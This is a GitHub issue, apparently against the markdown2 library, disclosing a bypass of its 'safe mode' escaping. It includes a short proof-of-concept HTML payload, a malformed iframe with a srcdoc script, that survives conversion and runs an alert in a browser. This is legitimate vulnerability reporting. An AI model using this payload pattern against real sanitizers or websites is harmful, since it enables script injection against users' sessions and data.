Skip to content

Safe Mode XSS #694

New issue
New issue
Closed
#695
Closed
Safe Mode XSS#694
#695
@salvatore-abello

Description

@salvatore-abello
salvatore-abello
opened on Mar 26, 2026

Describe the bug
It's possible to bypass the safe mode (escape and replace)

To Reproduce
Create a file called PoC.html:

<iframe
<http:> srcdoc="<script>alert()</script>" a=

Then, execute:

markdown2 --safe escape PoC.html > result.html

The content of result.html will be:

<p><iframe
&lt;http:&gt; srcdoc="&lt;script&gt;alert()&lt;/script&gt;" a=</p>

Finally, open result.html with a browser and you should see a pop up.

Debug info
Version of library being used: 2.5.6 (fetched from github)

Metadata

Metadata

Assignees

No one assigned

    Labels

    No labels
    No labels

    Projects

    No projects

    Milestone

    No milestone

    Relationships

    None yet

    Development

    No branches or pull requests

    Issue actions